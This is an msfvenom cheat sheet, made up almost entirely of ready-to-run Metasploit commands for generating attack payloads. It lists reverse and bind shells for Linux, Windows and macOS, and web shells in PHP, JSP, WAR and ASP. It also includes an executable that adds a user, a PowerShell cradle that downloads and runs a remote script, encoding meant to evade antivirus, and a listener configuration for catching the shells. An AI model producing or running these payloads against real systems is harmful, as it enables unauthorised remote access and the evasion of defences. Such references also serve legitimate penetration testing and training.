MSFVenom
Basic & Utility Commands
These commands are useful for exploring payloads and options.
| Command |
Description |
msfvenom -l payloads |
List all available payloads. |
msfvenom -l payloads | grep windows |
|
msfvenom -p <payload> --list-options |
Show options for a specific payload. |
msfvenom --list encoders |
List all available encoders. |
Payload Generation by Target OS
Linux
| Command |
Description |
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf |
Linux Meterpreter reverse shell (x86, multi-stage). |
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<IP> LPORT=<PORT> -f elf > shell.elf |
Linux Meterpreter bind shell (x86, multi-stage). |
msfvenom -p linux/x64/shell_bind_tcp RHOST=<IP> LPORT=<PORT> -f elf > shell.elf |
Linux bind shell (x64, single-stage). |
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf |
Linux reverse shell (x64, single-stage). |
msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh |
Bash reverse shell. |
msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py |
Python reverse shell. |
msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<PORT> -f raw > shell.pl |
Perl reverse shell. |
Windows
| Command |
Description |
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe |
Windows Meterpreter reverse shell. |
msfvenom -p windows/meterpreter/reverse_http LHOST=<IP> LPORT=<PORT> -f exe > shell.exe |
Windows Meterpreter HTTP reverse shell (good for bypassing egress firewalls). |
msfvenom -p windows/meterpreter/bind_tcp RHOST=<IP> LPORT=<PORT> -f exe > shell.exe |
Windows Meterpreter bind shell. |
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe |
Windows CMD reverse shell (multi-stage). |
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe |
Windows CMD reverse shell (single-stage, larger file). |
msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe |
Creates an executable to add a user to the local system. |
macOS
| Command |
Description |
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f macho > shell.macho |
macOS reverse shell (x86). |
msfvenom -p osx/x86/shell_bind_tcp RHOST=<IP> LPORT=<PORT> -f macho > shell.macho |
macOS bind shell (x86). |
Web Application & Scripting Payloads
| Command |
Description |
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php |
PHP Meterpreter reverse shell (raw output). |
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php |
PHP reverse shell (raw output). |
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp |
JSP reverse shell. |
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war |
WAR package reverse shell for Tomcat. |
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp |
ASP Meterpreter reverse shell. |
msfvenom -a x86 --platform windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://<IP>/nishang.ps1')\"" -f python > payload.py |
Python code that executes a PowerShell download cradle. |
Advanced Techniques: Encoding & Bad Characters
Use these to obfuscate payloads and bypass AV or simple input filters.
| Command |
Description |
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -e x86/shikata_ga_nai -i 5 -f exe > shell_encoded.exe |
Encode a payload 5 times with shikata_ga_nai. |
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=process -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d" |
Generate C-formatted shellcode, avoiding specific bad characters. |
Multi-Handler Listener Configuration
To catch the reverse shells generated above, use the exploit/multi/handler module.
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <YOUR_IP>
LHOST => <YOUR_IP>
msf6 exploit(multi/handler) > set LPORT <PORT>
LPORT => <PORT>-
msf6 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on <YOUR_IP>:<PORT>
set ExitOnSession false: Keeps the listener running after a session is established, allowing you to catch multiple connections.exploit -j: Runs the handler in the background as a job.
References